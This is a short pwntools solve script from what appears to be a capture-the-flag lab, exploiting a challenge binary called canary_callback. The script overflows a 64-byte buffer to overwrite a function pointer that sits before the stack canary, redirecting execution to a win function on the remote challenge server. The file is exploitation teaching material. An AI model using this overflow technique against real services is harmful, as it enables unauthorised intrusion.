OffSec-CTF/lab1_2_recap/02_enchanted_forest/solve.py

#!/usr/bin/env python3
from pwn import *

elf = context.binary = ELF("./canary_callback", checksec=False)

# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13575)
print(p.recvuntil(b"incantation:"))
# There is canary but is after the function pointer
win = 0x00000000004012A3
payload = flat(
    b"A" * 64,
    p64(win),
)
p.send(payload)
p.interactive()
# p.recvline()
# p.recvline()